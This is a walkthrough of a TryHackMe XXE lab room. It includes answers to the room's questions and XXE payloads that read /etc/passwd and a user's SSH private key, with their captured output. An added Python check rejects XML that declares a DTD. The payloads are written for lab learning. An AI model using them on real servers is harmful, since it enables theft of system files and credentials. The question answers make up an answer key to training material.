TryHackMe: OWASP Top 10 || Severity 4 || XML External Entity (XXE)
Before we begin the challenges, if you do not have a basic understanding of XML, please read this article: https://goayxh.medium.com/markup-language-what-is-xml-aa7e5a3ec66b
[Severity 4] XML External Entity — eXtensible Markup Language
#1 Full form of XML
eXtensible Markup Language
#2 Is it compulsory to have XML prolog in XML documents?
No
#3 Can we validate XML documents against a schema?
Yes
#4 How can we specify XML version and encoding in XML document?
XML prolog
[Severity 4] XML External Entity — DTD
#1 How do you define a new ELEMENT?
!ELEMENT
#2 How do you define a ROOT element?
!DOCTYPE
#3 How do you define a new ENTITY?
!ENTITY
[Severity 4] XML External Entity — Exploiting
#1 What is the name of the user in /etc/passwd?
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>
falcon:x:1000:1000:falcon,,,:/home/falcon:/bin/bash
#2 Where is falcon’s SSH key located?
By default, an SSH private key is stored in a file named id_rsa under the user's .ssh directory. /home/falcon/.ssh/id_rsa
#3 What are the first 18 characters of falcon’s private key?
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:/home/falcon/.ssh/id_rsa'>]>
<root>&read;</root>
-----BEGIN RSA PRIVATE KEY----- MIIEogIBAAKCAQEA7b -----END RSA PRIVATE KEY-----
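Both payloads above depend on the server accepting a DOCTYPE with a SYSTEM entity, so the fix on the application side is to refuse any document that declares a DTD before it reaches the real parser. The following is an added example, not part of the original walkthrough or the TryHackMe room; the names dtd_findings, parse_untrusted and UnsafeXML are hypothetical, and the sample input is the first payload from this page.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat

# The first payload shown above, reused as sample input.
PAGE_PAYLOAD = """<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>"""

# Constructed benign document for comparison.
CLEAN_DOC = '<?xml version="1.0"?><root>hello</root>'


class UnsafeXML(ValueError):
    """Document carries a DTD, so it is refused before real parsing."""


def dtd_findings(xml_text):
    """Return (kind, name, system_id) for each DOCTYPE/ENTITY declaration.

    Uses expat with no external-entity handler installed, so the entity
    target is reported but never opened.
    """
    findings = []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        findings.append(("doctype", name, system_id))

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        findings.append(("entity", name, system_id))

    scanner = expat.ParserCreate()
    scanner.StartDoctypeDeclHandler = on_doctype
    scanner.EntityDeclHandler = on_entity
    scanner.Parse(xml_text, True)
    return findings


def parse_untrusted(xml_text):
    """Build an element tree only when the document declares no DTD."""
    findings = dtd_findings(xml_text)
    if findings:
        raise UnsafeXML(f"rejected, DTD content found: {findings}")
    return ET.fromstring(xml_text)
```

The findings list is also worth logging: an entity whose system_id points at file:// in a request body is a strong signal of an XXE attempt.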